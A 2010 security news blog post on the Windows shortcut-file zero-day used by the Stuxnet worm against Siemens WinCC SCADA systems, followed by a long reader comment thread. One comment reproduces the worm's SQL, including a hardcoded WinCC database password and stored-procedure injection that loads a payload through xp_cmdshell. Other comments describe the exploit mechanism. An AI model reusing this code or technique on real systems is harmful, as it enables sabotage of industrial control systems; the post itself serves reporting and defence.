Researchers have discovered a sophisticated new strain of malicious software that piggybacks on USB storage devices and leverages what appears to be a previously unknown security vulnerability in the way Microsoft Windows processes shortcut files.
Update, July 16, 7:49 p.m. ET: Microsoft just released an advisory about this flaw, available here. Microsoft said it stems from a vulnerability in the “Windows shell” (Windows Explorer, e.g.) that is present in every supported version of Windows. The advisory includes steps that can mitigate the threat from this flaw.
Original post:
VirusBlokAda, an anti-virus company based in Belarus, said that on June 17 its specialists found two new malware samples that were capable of infecting a fully-patched Windows 7 system if a user were to view the contents of an infected USB drive with a common file manager such as Windows Explorer.
USB-borne malware is extremely common, and most malware that propagates via USB and other removable drives traditionally has taken advantage of the Windows Autorun or Autoplay feature. But according to VirusBlokAda, this strain of malware leverages a vulnerability in the method Windows uses for handling shortcut files.
Shortcut files — or those ending in the “.lnk” extension — are Windows files that link (hence the “lnk” extension) easy-to-recognize icons to specific executable programs, and are typically placed on the user’s Desktop or Start Menu. Ideally, a shortcut doesn’t do anything until a user clicks on its icon. But VirusBlokAda found that these malicious shortcut files are capable of executing automatically if they are written to a USB drive that is later accessed by Windows Explorer.
“So you just have to open infected USB storage device using [Windows] Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware,” wrote Sergey Ulasen, an anti-virus expert with the company, in an advisory published this month.
Ulasen said the malware installs two drivers: “mrxnet.sys” and “mrxcls.sys.” These so-called “rootkit” files are used to hide the malware itself so that it remains invisible on the USB storage device. Interestingly, Ulasen notes that both driver files are signed with the digital signature of Realtek Semiconductor Corp., a legitimate hi-tech company.
Ulasen said he reached out to Microsoft and to Realtek but got a response from neither. Jerry Bryant, group manager of response communications at Microsoft, told KrebsOnSecurity.com Wednesday that “Microsoft is investigating new public claims of malware propagating via USB storage devices. When we have completed our investigations we will take appropriate action to protect users and the Internet ecosystem.”
If this truly is a new vulnerability in Windows, it could soon become a popular method for spreading malware. But for now, this threat seems fairly targeted: Independent security researcher Frank Boldewin said he had an opportunity to dissect the malware samples, and observed that they appeared to be looking for Siemens WinCC SCADA systems, or machines responsible for controlling the operations of large, distributed systems, such as manufacturing and power plants.
“Looks like this malware was made for espionage,” Boldewin said.
Looks like this malware was made for espionage
Or for “direct action”, as the old saying has it.
I wonder if this has anything to do with that Russian Spy that was working in Microsoft… hm…
Microsoft seems to have addressed this problem to some extent in the following advisory.
http://support.microsoft.com/kb/967715
Bill,
Do you know something we don’t? The researchers (and this story) said it did not leverage the autorun feature.
I should add that autorun and autoplay have been nightmare features dogging Windows for many years. Microsoft tried many times to issue instructions on how to disable autorun/play in Windows, only to find out later that its instructions weren’t complete in all cases.
MS made some major changes to make Autoplay less of a threat in W7, but the default behavior when you insert a USB drive is still a prompt that asks you whether you want to use Windows Explorer to view the files.
But again, the researchers said that Autorun/play was not the issue here.
Yes, what makes this one nasty is that it does not require actually running the thing the shortcut points to. The flaw is triggered when Windows Explorer (or similar app) processes the shortcut itself.
Any analysis available as to how it’s “made for espionage”?
Hey Chris. Frank pasted some of the code over at a Wilders Security Forum listing. I’ll have to find the link, but here’s an example of what he found:
SOFTWARE\Microsoft\MSSQLServer
pdl
GracS\
2WSXcder
WinCCConnect
master
.\WinCC
sqloledb
GracS\cc_tlg7.sav
Step7\Example
use [%s]
declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]’)) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]’) set @e=charindex(‘,openrowset’,@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex(‘sp_msforeachdb’,@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t=’alter ‘+@t+’,openrowset(”SQLOLEDB”,”Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder”,”select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=””use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=””””–CC-S””””+char(80);if left(db_name(),2)=””””CC”””” select @t=substring(text,charindex(@s,text)+8,charindex(””””–*””””,text)-charindex(@s,text)-8) from syscomments where text like (””””%””””+@s+””””%””””);if @t is not NULL exec(@t)””;exec sp_msforeachdb @z”)’ exec (@t)
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]’)) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]’) order by c.number, c.colid set @e=charindex(‘–CC-SP’,@t) if @e=0 begin set @f=charindex(‘where’,@t) if @f0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t=’alter ‘+@t+’ where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=”1”) –CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ”CC%”) open r fetch next from r into @t while (@@fetch_status-1) begin set @t=left(@t,len(@t)-charindex(”\”,reverse(@t)))+”\GraCS\cc_tlg7.sav”;exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ”master..xp_cmdshell ””extrac32 /y “”+@t+”” “”+@t+”x””””;exec(@s);set @t = @t+”x”;dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r –*’ exec (@t)
use master
select name from master..sysdatabases where filename like N’%s’
exec master..sp_attach_db ‘wincc_svr’,N’%s’,N’%s’
exec master..sp_detach_db ‘wincc_svr’
use wincc_svr
I think the more interesting issue here is not a potential 0-day vulnerability, but that the malware seems to be digitally signed by Realtek–If that is true, that it is a legit Realtek signature, then that is the bigger news–that Realtek’s private key has been compromised, and is being used to sign illegitimate software.
-Josh
that would be big news, but not necessarily bigger than the new M$ vuln.
Wonder if Realtek was among the Aurora victims or if their keys were stolen in a different campaign?
>Wonder if Realtek was among the Aurora victims or if their keys were stolen in a different campaign?
I doubt their keys were stolen at all, given that you can buy a cert in pretty much any name from many CAs (I’ve got one for Apple Computer here, and I sure ain’t Apple) it’ll just be a case of someone buying a Realtek cert. It’d be interesting to get a copy of the cert chain, if someone (Brian?) has this I’d like to have a look at it to see which CA they went through, and what (if any) relation it has to real Realtek signing certs.
Updatiny my own comment, there’s a screenshot of the cert in the report prepared by VirusBlokAda, it’s a PDF so I can’t link to the image but it looks like a vaguely legit cert. There’s a discussion of it at http://blogs.pcmag.com/securitywatch/2010/07/certificate_used_to_code-sign.php, although the posters are a bit confused over how code signing certs work, the validity of the signature outlasts the lifetime of the cert. Either the attackers have compromised a genuine RTK key or they’ve got control of a CA key somewhere, which is why it’d be useful to see the full cert chain.
‘it’s a PDF so I can’t link to the image’
Why not?
You got a legitimate cert for Apple? Can you tell us what the full common name is on the cert, and who signed the cert? (Or just post a copy of the public cert?)
My experience was that the common CAs are careless, but not *that* careless.
>You got a legitimate cert for Apple? Can you tell us what the full common name is on the cert,
>and who signed the cert? (Or just post a copy of the public cert?)
I didn’t obtain it, I just have a copy, the obtaining was done by someone a lot more creative than me. You can find it at http://cryptopath.wordpress.com/2010/01/29/iphone-certificate-flaws/, scroll about a third of the way down the page.
>My experience was that the common CAs are careless, but not *that* careless.
They’re in an unregulated market where whoever can issue the most certs the quickest wins. What other outcome would you expect?
>If that is true, that it is a legit Realtek signature, then that is the bigger news–
>that Realtek’s private key has been compromised, and is being used to sign illegitimate software.
It’ll be a signature from someone using *a* Realtek certificate, but not *the* Realtek certificate.
It’s been interesting seeing the responses to this in various online forums, it’s almost universally “wow, Realtek’s private key was stolen” rather than “someone went to a random CA and bought a certificate using a stolen credit card” (and I realise the OP qualified his comments about “if it’s a legit Realtek signature”, this is just a general observation). For some reason though everyone seems to focus on the rather tricky crypto attack rather than the relatively straightforward (ab)use of the fact that most commercial CAs are just certificate vending machines.
Actually, it was THE certificate. I’ve got two realtek drivers with this certificate, spanning over at least two years, with the same validity dates.
Actually almost all of realtek’s drivers in use are signed by microsoft, not realtek.
I don’t understand.
Since I only use new USB sticks and don’t share them, how does this malware get on my USB stick?
(Sounds like a reference to safe sex)
My guess is the infection method is to toss a few of USB sticks with this malware in the parking lot of a targeted corp.
>how does this malware get on my USB stick?
Malware has been found on factory-new mass storage devices such as photo frames, MP3 players, etc. It’s reasonable to be suspicious of factory-new USB sticks for the same reason.
Will running an AV scan on a new USB device find these threats?
Unlikely.
Standard antivirus is generally useless against new threats, even worse than the generally mediocre detection of well established threats.
Good question – the fact is most people are not so saintly or so organized. I must confess that I have a box of personal USB keys that I have aquired over the years from sources I thought were trusted, such as major suppliers of DCS and SCADA equipment. I think most of us have USB keys that were not purchased directly from the store. They aren’t from the parking lot, but they did come from a “trusted” 3rd party.
Unfortunately earlier this year I was at a SCADA vendors private users event and was given a very nice USB key (brand new). It was infected…
Eric,
I’m a bit puzzled
Do you mean a literal parking lot with cars and vans and someone threw a handfull
of infected USB sticks around?
Or is “parking lot” in this context a metaphor for something?
Thanks
Peter in Sydney, New South Wales.
I meant a real parking lot with cars. I was referring to Fuast’s earlier posting “My guess is the infection method is to toss a few of USB sticks with this malware in the parking lot of a targeted corp.”
This is a real and tested distrubtion method. Leave infected USB keys in places such as the smoke pit, front desk/visitor area or parking lot near the company of interest (i.e. the target) and wait for people to pick them up, plug them in and try to find out who they belong to.
Very good research by Miles McQueen at INL showed that 20% of employees install found thumb drives in their computers.
By anyone who shares USB thumbs just like with people who shared floppies.
Hey Brian, maybe you could get through to the VirusBlokAda guys and get them to reveal whether this vulnerability is mitigated by running as a limited user. In the Wilders Security discussion some people are asking about it but aren’t getting any replies. Is this a kernel vulnerability that gets the exploit code running with root privs regardless of the privs of the logged-on user, or just another case where running as standard user will prevent the entire OS from being owned? Thanks…
Yep. I’ll add that to the pile 😉 I’ve got a couple of outstanding questions in to them in an email already.
Thanks!
Microsoft just put out an advisory on this (link is included in an update at the top of the above story).
From that advisory:
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Yet another reason why limited user accounts are important for day to day use
When you see this comment from Microsoft’s Security Bulletins – “Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.” – the correct interpretation is that malware variants seen so far haven’t yet contained payloads that hop to system processes. Exploit code and payload code are two different things. See Metasploit’s Meterpreter command “migrate” for a great example. I’ve successfully penetrated networks (under contract of course) by using this technique. The Spooler process, by the way, is almost always ran as SYSTEM.
> “When you see this comment from Microsoft’s Security Bulletins – “Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.” – the correct interpretation is that malware variants seen so far haven’t yet contained payloads that hop to system processes. Exploit code and payload code are two different things. See Metasploit’s Meterpreter command “migrate” for a great example. I’ve successfully penetrated networks (under contract of course) by using this technique. The Spooler process, by the way, is almost always ran as SYSTEM.”
That’s awfully vague… AFAIK, Metasploit’s migrate command can’t touch anything that your user account doesn’t have write permissions to. So standard users can’t just migrate their malware code to run in SYSTEM level processes like the print spooler service.
But yeah there’s always the possibility that a separate privilege escalation exploit is used after the remote code execution exploit to gain higher privileges.
Thanks, Brian. That advisory brings good news then. =) Looks like you could prevent malware infecting you with this vulnerability just by using a standard user account and AppLocker (or software restriction policy).
The vectors to exploit this vulnerability are a bit puzzling. USB drives and WebDAV/network shares? Why couldn’t the vulnerability be exploited by just putting the malicious shortcut files inside a zip archive etc and luring people to open the zip archive?
To my knowledge Win Explorer process .lnk files the same way no matter where they are – so yes this is a possible attack vector. However as has been pointed out previously – USB drives are an effective way to distribute malware. People trust them just because they’re not the Internet.
SANS reported that
“The exploit is triggered every time a folder containing a malicious LNK files is opened (for example, with Windows Explorer). It does not matter where this folder is – it does not have to be on a USB device, but in order to execute to malicious binary, the attacker has to specify its location correctly.”
The part about the attacker having to specify the location of the malicious binary correctly is what interests me. It would be easy to specify the location correctly if the malicious binary is in a root directory of a drive, but depending on exactly how the location must be specified (are wildcards and environment variables like UserProfile allowed), I suppose it could be next to impossible to specify the location correctly if the malware is in a zip file and will be unzipped to who knows where by the victim. Just guessing here.
@Aurelius
The proposed hypothetical didn’t mention saving, THEN opening the ZIP.
If the ZIP were to be opened directly, the malware could be dropped in rather predictable temporary folders for IE, FF and/or Windows. These could be linked easily by using environment variables, as you mentioned, e.g. %system%, %userprofile%, etc.
I’m not sure there is any security to prevent “setx” being used to redirect a variable to the current folder, although I would hope MS would address that, if not already.
Great story, great research, thanks again Brian.
Brian, if you can get through to the VirusBlokAda guys you might also ask whether there is anything in the mechanism that makes it specifically dependent on the USB as delivery vector?
From the description it sounds like the vuln being exploited is in Windows Explorer handling of a malicious .lnk file, makes me wonder if anything that delivered such a malicious file in a fashion that led to WinExplorer trying to open it would be successful.
If so this is a lot bigger than just espionage or cyberwar against Siemens SCADA systems!
it’s possible that it’s attacking Distributed Link Tracking
[1] instead of Windows Explorer.
[1] the first reference I can find is: http://support.microsoft.com/kb/312403
Great story Brian! Will be tracking this discussion with interest!
Given that this was meant to be propagated by USB sticks, have you heard anything about where and how did this critter get discovered? How prevalent is it?
@Jacob Brodsky, PE:
Disable autorun. For that matter, disable USB ports on critical assets in the BIOS and/or stick dummy USB devices in the USB ports labelled “Do not remove”.
This should be SOP for NERC Critical Assets (see pg 3):
http://www.nerc.com/fileUploads%5CFile%5Cnewsletters/NERCNews-2009-03.pdf
Disable autorun is good general advice, but from what I can tell is irrelevant in this case – the malware is driven by simply “Opening the infected USB storage device using [Windows] Explorer or any other file manager which can display icons”.
If you don’t open the USB key with some sort of file manager, why did you insert the USB key in the first place?
The answer to this ties into your second comment – “disable USB ports on critical assets”. Great idea, but tough to do and still manage your control system. If you don’t allow USB keys and you don’t allow network access to external servers, just how do you get patches to your ICS software? Extermely well organized companies will have specially designed patch distibution systems for SCADA and ICS, but it doesn’t typically fall under the typical WSUS deployment. Thus many engine.rs have no easy solution to distributing software and files into their ICS.
Just to be clear, I think letting USB keys loose in SCADA and ICS is a bad idea. The sad truth is the engineers running these systems are constantly cuaght between a rock and a hard place and sometimes they have to use the @#%^ things.
I think having a stand-alone computer with Linux booted from a live CD can be used to analyze a USB memory stick before the memory stick is put into any workstation computer, rebooted, and then used again to analyze that same USB memory stick after the stick is removed from that workstation computer. Get any suspicious executables before they can propagate into or out of any workstation computer.
.
You dont need external access to install updates. You can use WSUS locally or write a script to install each patch from a share on the LAN. No need for USB or internet.
The question still becomes HOW do you get the patches to the said system? The only other method left is via CD or DVD-Rom.
Running WSUS locally doesn’t help if you cannot get the patches. If it is on a SCADA network, it is isolated from other systems & networks and cannot reach the Internet. This implies your WSUS server cannot reach the Internet since it is on the same network (unless you’ve done something really bad here).
As other have alluded to, you need a method of getting the patches to those systems and the only method left, once you take out USB devices, is burning to a disc.
http://www.industcards.com/cc-iran.htm
Siemens SCADA is targeted. Spread is in Iran, India and Indonesia.
Nuclear power in Iran = highly controversial.
Who does not like Nuclear power in Iran?
Israel??
US??
Now even Russia?
If this is a vuln in the way Windows Explorer handles .lnk files, presumably this has a wider applicability, and not just to links stored on USB drives? As in, will this also apply to links stored on the desktop?
Is there something unique about the way Windows handles links found on USB drives, or is it just that the launch vector here is autorun, like classic USB malware?
2 important keywords here :
a) special kind of file (lnkfile)
b) icon handling
This news does not surprise me. Reason is, some years ago I was testing an FTP server on a Windows XP machine and I ran accross something weird, although totally inoffensive, since it didn´t run anything :
Upon browsing the server with Windows Explorer, I had an executable there called Explorer.exe (no it was not the legitim Explorer.exe) and I noticed all executables on the server (no matter what directory they were located) had that default .exe icon (normal behavior. Windows displays that default white icon for executables on download prompts and web/ftp servers) *BUT*, the “Explorer.exe” file had the same icon for the legitim Explorer.exe file, which is located in the Windows directory. Following this logic, I placed a “regedit.exe” file in the server. The result was exactly what I expected :
this executable got the same icon of the legitim “Regedit.exe”. The exact reason why this is happening I don´t know since I did not give importance to this thingie back then. But now with this new finding, I can guess why this happens easily :
Windows Explorer (the application used to browse the server) checks for the default icon entry for applications in the Windows Registry. When the icon can be customized, that is, you can select the icon you want for that particular type of file, it is set to :
%1
But, in the case of FTP/Web servers, Windows Explorer will display a default icon for .exe files, which is a white icon it retrieves from shell32.dll. Likely it is using relative paths to search for shell32.dll, and since the “%1” means it points to the file in question itself, it will look for an “Explorer.exe” file located in the same directory of “Explorer.exe” which is the program used to browse the FTP server and then assign its icon.
So far so good. We can now apply the same “theory” to the shortcut files, which happens to have its default icon set to “%1” as well, but executing an application…isnt this way too odd ?
Not really, because the open command for executable files starts with “%1” as well :
%1 %*
So, *in theory*, the shortcut file used in this new bug has its icon set to an application located in the same directory it resides, and for some weird reason Explorer is using the “default icon´s command” to open the icon file (which in this case is an .exe) when the shortcut is read from an USB stick. Doesn´t this reminds a bit that old “Desktop.ini program execution bug” ?
Brian Krebs, do you happen to have a proof of concept ?
You could test my theory and get back to us.
by the way nice site you got 😉
Non-techie here. I have read the MS advisory and noted the workarounds. I am not comfortable working in the registry. I did not understand the consequences of disabling the WebClient Service.
Can I assume my old, non-shared USB drives are safe? I have a new one that I dare not try.
From the advisory:
“Microsoft Active Protections Program (MAPP)”
“To improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP)
Partners.”
If you have a good up to date anti-malware program with real time protection you should be OK. For instance, Microsoft Security Essentials already blocks this threat and I’m sure the rest will soon follow if they haven’t already.
http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
In my own case, I’ve decided the workaround is too severe to be practical when balanced against the risk.
My memory is vague, but about a year ago there was some noise about malware being able to exploit shell extensions – the right-click menu – and launching itself. All versions of Windows (Explorer) were vunerable.
.
This exploit sounds like it might hook itself in through a similar mechanism. Time for Mark Russinovich to inspect this with Process Explorer; he’ll probably figure it out in milliseconds.
I further suggest that this malware be inspected as to it’s ability to infest the Apple Mac orchard; if it cannot, then Macs are the way to double-check the contents of such a drive for the presence of suspicious files. But I will have to impose on my friends…
.
Or boot a computer with a Ubuntu Live CD and then investigate the USB.
.
Some of the anti-malware vendors make free bootable scanners – AVG, etc. – that can scan and report, and give utilities that make it possible to change file names to prevent such files from executing. Once the file(s) have been disabled, they can be uploaded to VirusTotal and propagated to all the anti-malware companies.
According to a comment at Sans, Symantic has a definition for this. And a Sans update says other companies have as well.
http://isc.sans.edu/diary.html
http://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99
I use Symantic and have updated. Can I now go back to my usual paranoid life and not be too concerned about this one?
Don’t bet anything of consequence on it!
If what they have is a sig for the example exploit detection can be defeated as easily as swapping two instructions or adding a no-operation of some sort.
Most sig based av is incredibly lame at this stuff, but it is entrenched so nothing better has a chance and people trust it because they have to. Remain paranoid and concerned.
Yes.
The Symantec site says: “W32.Temphid [Also Known As: Troj/Stuxnet-A (Sophos)] is a worm that spreads through removable drives” and “Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000.”
This may or may not be the threat Brian has described. He says above that it can infect Windows 7, which Symantec has not (yet) acknowledged.
The 2286198 Advisory lists affected software and Win7 is on it, both 32 and 64 bit. The infection method (icon processing) appears to be universally effective and the payload can be changed anytime. Sounds very scary to me as a non-geek, think I’ll install workarounds and drive linux for a while.
JBV — It is the same. The Microsoft advisory that I added to the top of the blog post in an update references that threat name, and confirms that it affects Windows 7 as well.
Before this worm can infect your computer it needs you to do something stupid. Don’t do anything stupid, you won’t get it. Your best antimalware engine is between your ears.
Norton rates the threat level “Very Low.”
Number of infections: “0-49”
Number of sites: “0-2”
Distribution: “Low”
Threat containment: “Easy”
Removal: “Easy”
Damage level: “Low”
Why in the world would anyone take such a drastic measure as disabling all your shortcut icons to protect yourself against such a minuscule threat?
CloudoLiam — Those stats you reference from Symantec are effectively meaningless today. There are very few threat versions these days that affect more than small number of people before morphing into a new version. I’m confident that if you were to look at most of the threats Symantec lists that you’d see the very same thing.
Agreed, I’d have to do something stupid and I may so I’m doing the workarounds and no, the registry fix does not disable shortcut functionality, it only disables rendering of the shortcut’s icon in Explorer. Have XP Home SP3 and just done both workarounds, rebooted and shortcuts work fine. The only thing I don’t understand now is why only ~1/2 my shortcuts still have their regular icons (the other ~1/2 now have the generic Windows don’t-know-which-icon-to-use icon). I’d have expected all shortcuts to have the generic icon.
Thanks for clearing that up Michael. I totally misunderstood what the workaround would do. That said, I’ll still pass for now.
According to Microsoft the number of new machines reporting a threat “attempt” has been holding steady at around 1000 per day. About .05% of those have been in the United States.
Until that changes dramatically I’ll take those odds and keep my icons thank you.
Nobody wants to reveal exactly how the sploit works but if I’m reading this correctly, the user doesn’t have to do anything stupid – unless browsing to a directory with the infected lnk files (and using a GUI file manager) is stupid. The target isn’t going to be run unless the user expressly runs it but the path to the icon – it would seem – can be exploited. Why the system doesn’t interpret this path as an ordinary image file and after that leave well enough alone…
I have seen a *public* proof of concept. Really works.
The shortcut used is not a conventional shortcut must I add.
It is a special type of shortcut that does not point to a path, instead, it points to a CLSID (Control Panel). The parameter used is to load a DLL, just like a normal Control Panel Applet.
This can be triggered remotely via netbios shares. People who uses IE should be very cautious since the browser allows automatic opening of Netbios Shares in Windows Explorer (XP… Vista and 7 causes a prompt to be displayed *if* protected mode is turned on [default]).
Since an expired certificate was used there should be a software program that can detect expired certificates and remove them and not allow them to be installed. In addition, the human factor is indeed a weakness and it must be stressed that only company/government approved and purchased USB drives can be used at work. The problem of removable media is huge nowadays because data can be stolen and smuggled out via using a USB drive that can be hidden. Access on critical machines must be limited to a few trusted and fully background checked as well as fingerprinted individuals and the other users can use machines that do not have any access to critical controls. Finally, all uneeded programs should be removed and the machines be safely updated and have numerous login checks to prevent malicious activity.
It was not an expired certificate that was used to create this. After this became known, Verisign (or whomever issued it) revoked the certificate. So, as of whatever time they revoked it, the certificate was no longer valid.
Huge difference there, as now people *should* be getting a message about the driver not being signed….unless a system as been otherwise compromised.
>It was not an expired certificate that was used to create this. After this
>became known, Verisign (or whomever issued it) revoked the certificate. So,
>as of whatever time they revoked it, the certificate was no longer valid.
Verisign considers it no longer valid, Windows still considered it valid the last time I checked. We had a small pool going on when Windows will notice the revocation, unfortunately too many people who have experience with past revocations chose “never” so that didn’t work so well.
Some of these SCADA systems still use the old “hardware-lock” style of licensing, and require a license-bearing USB flash drive to be inserted 24/7 for the SCADA software to remain fully operational. Schneider Electric’s “CitectSCADA” uses this model currently, but I’m not familiar with the Siemens software mentioned in the article.
It would be particularly nefarious if this thing were designed to live on one of those USB keys, and if the keys were shipping with the infection in-tow.. In that case, the unaware vendor would be actually mandating the infection. Ouch.
Looking at the advisory, it states something about causing MS Office Outlook to run programs. How would this work – an e-mail can contain the malformed lnk file, or is there more to it than that?
For those interested in seeing how this could be triggered, here a demonstration :
http://www.securityfocus.com/bid/41732/exploit
@Matt
I guess this is another issue. This Outlook vulnerability is different, and for what the advisory states it requires users to open a specially crafted e-mail attachment. See here :
http://www.securityfocus.com/bid/41446/discuss
The targetted audience of the Win32/Stuxnet worm illustrates how important it is to fully assess the security program within any industrial facility, and include a comprehensive defense-in-depth (DiD) strategy that provides “multiple layers of protection”.
To often, control systems are implemented with a false sense of security because they utilize demilitarized zones (DMZ) and firewalls, however, they fail to consider all vectors an attacker may use.
For example, considerable effort is made in securing the “inbound” rules used on firewalls, yet little thought is given to equally securing “outbound” rules, which would have prevented the backdoor access that compromised proprietary system data with the Stuxnet worm.
This also illustrates the need to review and disable all unnecessary services and features of the system. These few countermeasures, as simple as they are, significantly reduce or eliminate entirely the consequences associated with such an attack.
What is most disturbing in this “targetted” attack is the lack of disclosure by many of the key players, including the control system vendor for not disclosing the use of default passwords which is against all known cyber security practices, and the US-CERT for not making their announcement public. Disclosures need to be made publicly to minimize the consequences for those who have been compromised in an attack.
The ICS-CERT has released their annoucement of the vulnerability (July 20):
http://www.us-cert.gov/control_systems/pdf/ICSA-10-201-01%20-%20USB%20Malware%20Targeting%20Siemens%20Control%20Software.pdf
US-CERT also has an annoucement (July 15, updated July 19):
http://www.kb.cert.org/vuls/id/940193
Here’s a better workaround: when first using any USB key, open a command prompt, browse to the drive, and enter “del /s *.lnk”. That should clean everything up nicely. At least to the point where browsing with Explorer is safe, anyway.
By the way, I don’t see why we shouldn’t be equally concerned about shortcuts inside downloaded Zip files. Guess I’ll have to re-learn how to use a command-line archive tool. Also, no one has suggested why an icon embedded in an executable doesn’t offer the same potential exploit.
We’ve been hearing of fears that our power grid and other essential infrastructure components represent a vulnerability that, if compromised, could have devastating consequences. AFAIK, this is the first public disclosure of an exploit that has been found to directly target the SCADA components which control much of that infrastructure.
Has anyone ever assessed to what extent our infrastructure (power, water, waste, manufacturing, transportation) is controlled by the SCADA systems and protocols?
For now, I’ll assume then that the good folks at Homeland Security (or whatever agency tasked with this matter) are aware of this exploit and are taking appropriate actions.
Perhaps they will take on the task of tracking down the source of the exploit since no mention has been made of the source of the USB drive analyzed by VirusBlokAda.
Good job, BK
F-secure/ESET has found another exploit using a Jmicron certificate. Jmicron and RealTek both have offices in a business park in Taiwan.
But most interesting is Siemens response to the “attack” on their SCADA systems:
Additional news regarding Stuxnet is that Siemens, whose SIMATIC WinCC databases are targeted, has advised against changing their SCADA system’s hardcoded password. The concern is that adjusting the password will create damaging conflicts.
If SCADA machines and databases are talking to each other using hardcoded passwords that can’t be changed without disrupting the system inter-connectivity, why bother having passwords?
Tom
what if your pc/memory card have already been infected. i have 3 memory cards, 2 for my mp3 and 1 for my mobile phone. they were all infected and all my folders change to .lnk…it’s so frustrating coz all the files in the folders were gone and i couldn’t even reformat the mcards. do i have to reformat my desktop as well?
How is this vulnerability different from the one found in 2005?
Microsoft Security Bulletin MS05-049
Vulnerabilities in Windows Shell Could Allow Remote Code Execution (900725)
http://www.microsoft.com/technet/security/Bulletin/MS05-049.mspx